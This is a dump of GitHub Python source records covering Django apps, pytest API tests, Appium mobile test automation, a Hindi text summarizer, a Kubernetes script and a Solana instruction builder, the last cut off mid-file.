+{"seq_id":"13105584486","text":"from django.conf import settings\nfrom django.shortcuts import render\n\nfrom .forms import RegModelForm, ContactForm\nfrom .models import Registrado\n\n# Create your views here.\ndef home(request):\n titulo = \"Welcome!\"\n if request.user.is_authenticated:\n titulo = \"Welcome %s\" %(request.user)\n form = RegModelForm(request.POST or None)\n \n context = {\n \"titulo\": titulo,\n \"form\": form,\n }\n \n if form.is_valid():\n instance = form.save(commit=False)\n nombre = form.cleaned_data.get(\"nombre\")\n email = form.cleaned_data.get(\"email\")\n if not instance.nombre:\n instance.nombre = \"PERSONA\"\n instance.save()\n \n context = {\n \"titulo\": \"Gracias %s!\" %(nombre)\n }\n\n if not nombre:\n context = {\n \"titulo\": \"Gracias %s!\" %(email)\n }\n\n print (instance)\n print (instance.timestamp)\n\n if request.user.is_authenticated and request.user.is_staff:\n queryset = Registrado.objects.all().order_by('-timestamp') \n context = {\n \"queryset\": queryset,\n }\n return render(request, \"home.html\", context)\n\ndef contact(request):\n titulo = \"Contacto\"\n form = ContactForm(request.POST or None)\n if form.is_valid():\n for key in form.cleaned_data:\n print (key)\n print (form.cleaned_data.get(key))\n\n context = {\n \"form\": form,\n \"titulo\": \"Contacto\",\n }\n return render(request, \"forms.html\", context)","repo_name":"lnpereyra/djangofirstapp","sub_path":"src/boletin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13141286226","text":"from django.db import models\n\n# Create your models here.\n\nclass Author(models.Model):\n name = models.CharField('Имя автора', max_length= 250)\n surname = models.CharField('Фамилия автора', max_length=250)\n\n def __str__(self):\n return self.name\n\nclass Book(models.Model):\n author = models.ForeignKey(Author)\n book_name = models.CharField('Название книги', max_length=250)\n release_date = models.DateField('Дата выпуска', )\n\n def __str__(self):\n return self.book_name\n\nclass Comment(models.Model):\n comments_link_user = models.ForeignKey('User')\n comments_link_author = models.ForeignKey(Author, blank= True,null=True)\n comments_link_book = models.ForeignKey(Book, blank=True, null=True)\n comment_text = models.TextField('текст комментария', max_length=250)\n\nclass User (models.Model):\n name = models.CharField('Имя автора', max_length=250)\n surname = models.CharField('фамилия автора', max_length=250)\n\n\n","repo_name":"sergeyrudov/library","sub_path":"Books/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20814575783","text":"from app.domain import List, Item\nfrom app.infrastructure.repositories import ListRepository\nfrom app.error import Error\nfrom result import Ok, Result\n\n\nclass List:\n def __init__(self):\n self.list_repository = ListRepository()\n\n def find(self, list_id: str) -> Result[List, Error]:\n list_result = self.list_repository.find_by_id(list_id)\n return list_result\n\n def create_item(\n self,\n text: str,\n list_id: str,\n ) -> Result[Item, Error]:\n # find the existing list\n list_result = self.list_repository.find_by_id(list_id)\n\n # if list was not found, return error\n if list_result.is_err():\n return list_result\n\n # pull out the list domain object\n list = list_result.ok()\n\n # create the new item\n item = Item(text=text)\n\n # add the item to the list\n list.add_item(item)\n\n # save the aggregate\n save_result = self.list_repository.save(list)\n\n if save_result.is_err():\n return save_result\n\n return Ok(item)\n","repo_name":"MathyouMB/django-ddd-service-template","sub_path":"app/application/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"13128376856","text":"import tkinter as tk\r\nfrom PIL import Image, ImageTk, EpsImagePlugin\r\nimport pyautogui\r\nfrom app.cv import processing\r\n\r\nclass Drawing(tk.Tk):\r\n def __init__(self):\r\n tk.Tk.__init__(self)\r\n self.x = self.y = 0\r\n self.canvas = tk.Canvas(self, width=1920, height=1080, cursor=\"cross\")\r\n self.canvas.pack(side=\"top\", fill=\"both\", expand=True)\r\n self.canvas.bind(\"\", self.on_button_press)\r\n self.canvas.bind(\"\", self.on_button3_press)\r\n self.canvas.bind(\"\", self.on_move)\r\n\r\n self.line = None\r\n\r\n self.start_x = None\r\n self.start_y = None\r\n\r\n self.old_x = None\r\n self.old_y = None\r\n\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n self._draw_image()\r\n\r\n def _draw_image(self):\r\n self.im = Image.open('screenshot.jpg')\r\n self.tk_im = ImageTk.PhotoImage(self.im)\r\n self.canvas.create_image(0, 0, anchor=\"nw\", image=self.tk_im)\r\n\r\n def on_button_press(self, event):\r\n self.old_x = self.start_x\r\n self.old_y = self.start_y\r\n self.start_x = event.x\r\n self.start_y = event.y\r\n if self.old_x is not None:\r\n if abs(event.x - self.first_x) <= 10 and abs(event.y - self.first_y) <= 10:\r\n self.canvas.create_line(self.old_x, self.old_y, self.first_x, self.first_y, fill='red', tag=\"lines\")\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n img = Image.open('screenshot.jpg')\r\n EpsImagePlugin.gs_windows_binary = r'C:\\Program Files\\gs\\gs9.56.1\\bin\\gswin64c'\r\n self.canvas.postscript(file='polygon' + '.eps')\r\n img = Image.open('polygon' + '.eps')\r\n img.save('polygon' + '.png', 'png')\r\n img = Image.open('polygon' + '.png')\r\n processing(img)\r\n else:\r\n self.canvas.create_line(self.old_x, self.old_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n else:\r\n self.first_x = self.start_x\r\n self.first_y = self.start_y\r\n\r\n if not self.line:\r\n self.line = self.canvas.create_line(self.start_x, self.start_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n def on_move(self, event):\r\n curX, curY = (event.x, event.y)\r\n\r\n # expand rectangle as you drag the mouse\r\n if self.start_x is not None:\r\n self.canvas.coords(self.line, self.start_x, self.start_y, curX, curY)\r\n\r\n def on_button3_press(self, event):\r\n self.canvas.delete('lines')\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n\r\ndef main():\r\n pyautogui.screenshot('screenshot.jpg', region=(0, 0, 1920, 1080))\r\n draw = Drawing()\r\n draw.mainloop()\r\n","repo_name":"NovakWilson/projectt","sub_path":"drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14868206940","text":"import pytest\nfrom api import Restful\n\nhost = 'http://localhost:32768'\n\n\ndef create_new(type_b, name, age):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # create new\n res = Restful(host).create_new_bear(param_dict)\n res_stat = res.status_code\n\n list_r[3] = str(res_stat)\n if res_stat != 500:\n created_id = int(res.content)\n print('id new objeckt: ', created_id,'the collected parameters: ', param_dict, \\\n 'status_code: ',res_stat)\n\n # check type created obj\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :',list_r)\n return list_r\n\n\ndef create_one():\n param_dict = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param_dict)\n return int(res.content)\n\n\ndef update(type_b, name, age, created_id):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # update param\n res = Restful(host).update_bear(created_id, param_dict)\n list_r[3] = str(res.status_code)\n\n # check update\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :', list_r)\n return list_r\n\n\ndef test_dellete_one():\n param = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param)\n created_id = int(res.content)\n print('created_id :', created_id, ' ', param, ' ', res.status_code)\n # dell by id\n Restful(host).dell_bear(created_id)\n # check odj by id dellete\n res = Restful(host).read_bear(created_id)\n assert res.content == b'EMPTY'\n\n\nclass Parametrs_bear:\n def param(self, type_b, name, age):\n param_dict = {\"bear_type\": type_b, \"bear_name\": name, \"bear_age\": age}\n return param_dict\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('POLAR', 'mihail', 17.5, '200'),\n ('BROWN', 'mihail', 17.5, '200'),\n ('BLACK', 'mihail', 17.5, '200'),\n ('GUMMY', 'mihail', 17.5, '200'),\n ('', 'mihail', 17.5, '500'),\n ('BROWN', '', 17.5, '500'),\n ('BLACK', 'mihail', '', '500'),\n ('BLACK', 'mihail', 0, '200'),\n ('black', 'mihail', 10, '500'),\n ('white', 'mihail', 10, '500'),\n (0, 'mihail', 10, '500'),\n ('BLACK', 'm' * 100, 10, '200'),\n ('BLACK', 'm' * 1000, 10, '200'),\n ('BLACK', 'mihail', -0.1, '200'),\n ('BLACK', 'mihail', 200, '500'),\n\n ]\n )\ndef test_create(type_b, name, age, res):\n l_res = create_new(type_b, name, age)\n n_res = l_res[3]\n if age != '' and age < 0:\n age = 0\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name.upper() in l_res[1]\n assert age == l_res[2]\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('BROWN', 'mihail', 17.5, '200'),\n ('POLAR', 'Change_Name', 17.5, '200'),\n ('POLAR', 'mihail', 10, '200'),\n ]\n )\ndef test_update(type_b, name, age, res):\n l_res = update(type_b, name, age, create_one())\n n_res = l_res[3]\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name in l_res[1]\n assert age == l_res[2]\n\n\ndef test_dellete_all():\n # clear base\n Restful(host).dell_all_bear()\n # check base == []\n res = Restful(host).read_all_bears().json()\n assert res == []\n","repo_name":"Polenichko/Alaska_bears","sub_path":"tests_script.py","file_name":"tests_script.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23775447961","text":"import kubernetes\n\n\nif __name__ == \"__main__\":\n kubernetes.config.load_kube_config()\n api = kubernetes.client.CoreV1Api()\n # a = api.read_namespace('default')\n # print(a.metadata.name)\n custom_obj_api = kubernetes.client.CustomObjectsApi()\n\n tenants = custom_obj_api.list_cluster_custom_object('ip.demo.com', 'v1', 'tenants')\n print(tenants['items'])\n # old = ['user1@demo.com', 'user2@demo.com']\n # new = ['user1@demo.com', 'user3@demo.com']\n\n # print(f\"new: {set(new) - set(old)}\")\n \n # print(f\"removed: {set(old) - set(new)}\")","repo_name":"JasperJiang/KubernetesCRDPlay","sub_path":"kubectl.py","file_name":"kubectl.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6069553232","text":"from selenium import webdriver\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom time import sleep\nimport re\n\nfrom sweet import log, vars\nfrom sweet.utility import compare, replace, json2dict\n\nfrom sweet.modules.mobile.window import Windows\nfrom sweet.modules.web.locator import locating\nfrom sweet.modules.web.config import *\n\n\nclass App:\n\n keywords = keywords\n\n def __init__(self, setting):\n self.action = {}\n platform = setting.get('platformName', '')\n # snapshot = setting.pop('snapshot', False)\n\n if platform.lower() == 'ios':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n elif platform.lower() == 'android':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n # 等待元素超时时间\n self.driver.implicitly_wait(element_wait_timeout) # seconds\n # 页面刷新超时时间\n self.driver.set_page_load_timeout(page_flash_timeout) # seconds\n self.w = Windows()\n self.w.driver = self.driver\n\n def _close(self):\n pass\n\n def _call(self, step):\n # 处理截图数据\n # snap = Snapshot()\n # snap.pre(step)\n\n context = replace(step.get('frame', '')).strip()\n self.w.switch_context(context)\n\n if self.w.current_context.startswith('WEBVIEW'):\n # 切换标签页\n tab = step['data'].get('#tab')\n if tab:\n del step['data']['#tab']\n self.driver.switch_to_window(self.w.windows[tab])\n log.debug(f'current context: {repr(self.w.current_context)}')\n\n # 根据关键字调用关键字实现\n element = getattr(self, step['keyword'].lower())(step)\n # snap.web_shot(step, element)\n\n\n def title(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.title)}')\n\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.title\n else:\n assert data['text'] == self.driver.title\n # 只能获取到元素标题\n for key in output:\n vars.put({key: self.driver.title})\n\n\n def current_url(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.current_url)}')\n try:\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.current_url\n else:\n assert data['text'] == self.driver.current_url\n except:\n raise Exception(\n f'check failure, DATA:{data[\"text\"]}, REAL:{self.driver.current_url}')\n # 只能获取到元素 url\n for key in output:\n vars.put({key: self.driver.current_url})\n return self.driver.current_url\n\n def locat(self, element, action=''):\n if not isinstance(element, dict):\n raise Exception(f'no this element:{element}')\n\n\n def open(self, step):\n url = step['element']['value']\n\n if step['data'].get('#clear', ''):\n self.driver.delete_all_cookies()\n\n self.driver.get(url)\n\n cookie = step['data'].get('cookie', '')\n if cookie:\n self.driver.add_cookie(json2dict(cookie))\n co = self.driver.get_cookie(json2dict(cookie).get('name', ''))\n log.debug(f'cookie is add: {co}')\n sleep(0.5)\n\n\n def check(self, step):\n data = step['data']\n if not data:\n data = step['expected']\n\n element = step['element']\n by = element['by']\n output = step['output']\n\n if by in ('title', 'current_url'):\n getattr(self, by)(data, output)\n else:\n location = self.locat(element)\n for key in data:\n # 预期结果\n expected = data[key]\n # 切片操作处理\n s = re.findall(r'\\[.*?\\]', key)\n if s:\n s = s[0]\n key = key.replace(s, '')\n\n if key == 'text':\n real = location.text\n else:\n real = location.get_attribute(key)\n if s:\n real = eval('real' + s)\n\n log.debug(f'DATA:{repr(expected)}')\n log.debug(f'REAL:{repr(real)}')\n try:\n compare(expected, real)\n except:\n raise Exception(\n f'check failure, DATA:{repr(expected)}, REAL:{repr(real)}')\n\n # 获取元素其他属性\n for key in output:\n if output[key] == 'text':\n v = location.text\n vars.put({key: v})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n v = location.text[:-3]\n vars.put({key: v})\n else:\n v = location.text\n vars.put({key: v})\n else:\n v = location.get_attribute(output[key])\n vars.put({key: v})\n\n\n def notcheck(self, step):\n try:\n self.check(step)\n raise Exception('check is success')\n except:\n pass\n\n def input(self, step):\n data = step['data']\n location = self.locat(step['element'])\n\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.send_keys(*data[key])\n elif location:\n location.send_keys(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.send_keys(d)\n sleep(0.3)\n\n def set_value(self, step):\n data = step['data']\n location = self.locat(step['element'])\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.set_value(*data[key])\n elif location:\n location.set_value(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.set_value(d)\n sleep(0.3)\n\n def click(self, step):\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n for element in elements:\n location = self.locat(element, 'CLICK')\n sleep(0.5)\n try:\n location.click()\n except ElementClickInterceptedException: # 如果元素为不可点击状态,则等待1秒,再重试一次\n sleep(1)\n location.click()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def tap(self, step):\n action = TouchAction(self.driver)\n\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n\n for element in elements:\n if ',' in element:\n position = element.split(',')\n x = int(position[0])\n y = int(position[1])\n position = (x, y)\n self.driver.tap([position])\n sleep(0.5)\n else:\n location = self.locat(element, 'CLICK')\n action.tap(location).perform()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name}) \n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def press_keycode(self, step):\n element = step['element']\n self.driver.press_keycode(int(element))\n\n def swipe(self, step):\n elements = step['elements']\n duration = step['data'].get('持续时间', 0.3)\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if duration:\n self.driver.swipe(start_x, start_y, end_x,\n end_y, sleep(float(duration)))\n else:\n self.driver.swipe(start_x, start_y, end_x, end_y)\n\n def line(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 1, '坐标格式或数量不对,正确格式如:258,756|540,1032'\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n action = TouchAction(self.driver)\n action = action.press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n for i in range(1, len(postions)):\n action.move_to(x=postions[i][0], y=postions[i]\n [1]).wait(duration * 1000)\n action.release().perform()\n\n def line_unlock(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 2, '坐标格式或数量不对,正确格式如:lock_pattern|1|4|7|8|9'\n location = self.locat(elements[0]) \n rect = location.rect\n w = rect['width'] / 6\n h = rect['height'] / 6\n\n key = {}\n key['1'] = (rect['x'] + 1 * w, rect['y'] + 1 * h)\n key['2'] = (rect['x'] + 3 * w, rect['y'] + 1 * h)\n key['3'] = (rect['x'] + 5 * w, rect['y'] + 1 * h)\n key['4'] = (rect['x'] + 1 * w, rect['y'] + 3 * h)\n key['5'] = (rect['x'] + 3 * w, rect['y'] + 3 * h)\n key['6'] = (rect['x'] + 5 * w, rect['y'] + 3 * h)\n key['7'] = (rect['x'] + 1 * w, rect['y'] + 5 * h)\n key['8'] = (rect['x'] + 3 * w, rect['y'] + 5 * h)\n key['9'] = (rect['x'] + 5 * w, rect['y'] + 5 * h)\n\n action = TouchAction(self.driver)\n for i in range(1, len(elements)):\n k = elements[i]\n if i == 1:\n action = action.press(\n x=key[k][0], y=key[k][1]).wait(duration * 1000)\n action.move_to(x=key[k][0], y=key[k][1]).wait(duration * 1000)\n action.release().perform()\n\n def rocker(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n rocker_name = step['data'].get('摇杆', 'rocker')\n release = step['data'].get('释放', False)\n\n # if isinstance(element, str):\n # if element:\n # element = [element]\n # else:\n # element = []\n\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n # 如果 action 中么有此摇杆名,则是新的遥感\n if not self.action.get(rocker_name):\n self.action[rocker_name] = TouchAction(self.driver)\n self.action[rocker_name].press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n # 新摇杆的第一个点已操作,需要删除\n postions.pop(0)\n # 依次操作\n for i in range(len(postions)):\n self.action[rocker_name].move_to(\n x=postions[i][0], y=postions[i][1]).wait(duration * 1000)\n\n if release:\n # 释放摇杆,并删除摇杆\n self.action[rocker_name].release().perform()\n del self.action[rocker_name]\n else:\n self.action[rocker_name].perform()\n\n def scroll(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '元素格��或数量不对,正确格式如:origin_el|destination_el'\n origin = self.locat(elements[0])\n destination = self.locat(elements[1])\n self.driver.scroll(origin, destination)\n\n def flick_element(self, step):\n elements = step['elements']\n speed = step['data'].get('持续时间', 10)\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:elment|200,300'\n location = self.locat(elements[0])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if speed:\n self.driver.flick_element(location, end_x, end_y, int(speed))\n\n def flick(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n self.driver.flick(start_x, start_y, end_x, end_y)\n\n def drag_and_drop(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '元素格式或数量不对,正确格式如:origin_el|destination_el'\n origin = self.locat(elements[0])\n destination = self.locat(elements[1]) \n self.driver.drag_and_drop(origin, destination)\n\n def long_press(self, step):\n action = TouchAction(self.driver)\n\n element = step['element']\n duration = step['data'].get('持续时间', 1000)\n if ',' in element or ',' in element:\n position = element.replace(',', ',').split(',')\n x = int(position[0])\n y = int(position[1])\n action.long_press(x=x, y=y, duration=duration).perform()\n else:\n location = self.locat(element)\n action.long_press(location, duration=duration).perform()\n sleep(0.5)\n\n def pinch(self, step):\n element = step['element']\n location = self.locat(element)\n percent = step['data'].get('百分比', 200)\n steps = step['data'].get('步长', 50)\n self.driver.pinch(location, percent, steps)\n\n def zoom(self, step):\n element = step['element']\n location = self.locat(element)\n percent = step['data'].get('百分比', 200)\n steps = step['data'].get('步长', 50)\n self.driver.zoom(location, percent, steps)\n\n def hide_keyboard(self, step):\n self.driver.hide_keyboard()\n\n def shake(self, step):\n self.driver.shake()\n\n def launch_app(self, step):\n self.driver.launch_app()\n\n def is_locked(self, step):\n status = self.driver.is_locked()\n assert status, \"it's not locked\"\n\n def lock(self, step):\n self.driver.lock()\n\n def unlock(self, step):\n self.driver.unlock()","repo_name":"tonglei100/sweetest","sub_path":"sweet/modules/mobile/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":607,"dataset":"github-code","pt":"53"}
+{"seq_id":"27268875644","text":"from rest_framework import serializers\n\nfrom users.models import User\nfrom api_yamdb.settings import RESERVED_NAME\n\n\ndef validate_users(self, data):\n if_username = User.objects.filter(username=data.get('username'))\n if_email = User.objects.filter(email=data.get('email'))\n if User.objects.filter(username=data.get('username'),\n email=data.get('email')).exists():\n return data\n if if_email:\n raise serializers.ValidationError(f'Почта {if_email}'\n f'уже использовалась')\n if if_username:\n raise serializers.ValidationError(f'Имя {if_username}'\n f'уже использовалось')\n if str(data.get('username')).lower() == RESERVED_NAME:\n raise serializers.ValidationError('Нельзя использовать имя me')\n return data\n","repo_name":"MihaRooll/yamdb_final","sub_path":"api_yamdb/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19558735726","text":"from django.shortcuts import render\nimport numpy as np\nimport sys\nimport pandas as pd\nimport nltk\nimport re\nimport codecs\nfrom hindi_summarizer.sent_segment import sent_tokenize\nfrom hindi_summarizer.word_segment import Tokenizer\nfrom bs4 import BeautifulSoup as bs\nimport requests as r\nimport networkx as nx\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport json\n#from hindi_summarizer.w2v import vocab\ndef main(l):\n try:\n if(l[0:12]==\"https://www.\"):\n all_of_it=\"\"\n req=r.get(l)\n con=req.content\n soup=bs(con,'html.parser')\n txt=soup.find_all('p')\n for i in txt:\n all_of_it+=i.text\n else:\n all_of_it=l\n print(all_of_it)\n out=re.split(',|\\.|\\|',all_of_it)\n sentences = sent_tokenize(all_of_it)\n with open('hindi_summarizer\\Aembed_hin.json',encoding='utf8') as f:\n word_embeddings=json.load(f)\n vectors=[]\n l=[]\n [l.append(0) for i in range(100)]\n for i in sentences:\n if len(i) != 0:\n v = sum([np.array(word_embeddings.get(w,l)) for w in i])/(len(i)+0.001)\n else:\n v = np.zeros((100,))\n vectors.append(v)\n print(vectors)\n mat = np.zeros([len(sentences), len(sentences)])\n for i in range(len(sentences)):\n for j in range(len(sentences)):\n if i != j:\n mat[i][j] = cosine_similarity(vectors[i].reshape(1,100),vectors[j].reshape(1,100))[0,0]\n nx_graph = nx.from_numpy_array(mat)\n hubs,scores = nx.hits(nx_graph,max_iter=100000000000000000000000000000000000)\n ranked_sentences = sorted(((scores[i],s) for i,s in enumerate(out)), reverse=True)\n c=0\n s=\"\"\n inl=[]\n k=0.2*len(out)\n for i in ranked_sentences:\n c+=1\n s+=i[1]+'|'\n if(c>k):\n break\n inl.append(s)\n inl.append(all_of_it)\n return inl\n except:\n inl=[]\n inl.append(\"Sorry for the inconvenience our backend does not support articles with bad encoding patterns please try with other websites or try copy pasting text instead of giving the link\")\n inl.append(l)\n return(l)\n","repo_name":"pramod-mamidi/hindi-and-english-text-summarizer","sub_path":"hindi_summarizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4070657338","text":"NUMBER_OF_SENSORS = 8\nPLOTS_PER_ROw = 3\n\nplots = {\n # default plot parameters\n 'default': {\n 'title': 'Sensor {index}',\n 'color': '6F6',\n 'xrange': [0, 1000],\n 'yrange': [0, 10],\n 'fill': False,\n 'show': True,\n 'link_master': True\n },\n\n # specialized parameters\n 0: {\n 'title': 'Meh',\n 'color': '67C8FF',\n 'yrange': [40, 160],\n 'link_master': False\n },\n 5: {\n 'yrange': [0, 700],\n 'color': 'F66'\n },\n 4: {\n 'fill': '6F63'\n },\n\n #special plots\n 'time': {\n 'show': True,\n 'title': 'Time between updates'\n },\n 'master': {\n 'show': False\n }\n}\n\ntarget_period = 0.01\n\n# defines basic calibration/transformation functions\ntransform = {\n 'default': None,\n # scale [0,1024) => [50,150)\n 0: lambda x: x/1024*100+50,\n # identity\n 3: lambda x: x,\n}\n\n# export to file\nexport = {\n 'raws': {\n 'format': 'text',\n 'stage': 'acquisition',\n 'filename': 'data/raw_data.data'\n },\n 'transformed': {\n 'format': 'text',\n 'stage': 'transform',\n 'filename': 'data/scaled_data.data'\n }\n}","repo_name":"mvonthron/plotsplotsplots","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10376479947","text":"import hashlib\nimport json\nimport math\nimport random\n\nimport base58\nfrom solana.publickey import PublicKey\nfrom solana.system_program import SYS_PROGRAM_ID\nfrom solana.transaction import AccountMeta, TransactionInstruction\nfrom spl.token.constants import ASSOCIATED_TOKEN_PROGRAM_ID, TOKEN_PROGRAM_ID\nfrom spl.token.instructions import get_associated_token_address\n\nCOMPUTE_BUDGET_ID: PublicKey = PublicKey(\n \"ComputeBudget111111111111111111111111111111\")\nDEFAULT_UNITS = 500 * 1000\nDEFAULT_HEAP_FRAME = 256 * 1024\n\n\nclass Instruction:\n @staticmethod\n def account_v3(solana_wallet, neon_wallet_pda,\n neon_wallet, evm_loader_id) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=solana_wallet,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=neon_wallet_pda,\n is_signer=False, is_writable=True),\n ]\n\n data = bytes.fromhex('28') + bytes.fromhex(str(neon_wallet)[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def sync_native(account: PublicKey):\n keys = [AccountMeta(pubkey=account, is_signer=False, is_writable=True)]\n data = bytes.fromhex('11')\n return TransactionInstruction(keys=keys, program_id=TOKEN_PROGRAM_ID, data=data)\n\n\n @staticmethod\n def deposit(solana_pubkey, neon_pubkey, deposit_pubkey,\n neon_wallet_address, neon_mint, evm_loader_id) -> TransactionInstruction:\n associated_token_address = get_associated_token_address(\n solana_pubkey, neon_mint)\n pool_key = get_associated_token_address(deposit_pubkey, neon_mint)\n keys = [\n AccountMeta(pubkey=associated_token_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=pool_key, is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_pubkey, is_signer=False, is_writable=True),\n AccountMeta(pubkey=TOKEN_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=solana_pubkey,\n is_signer=True, 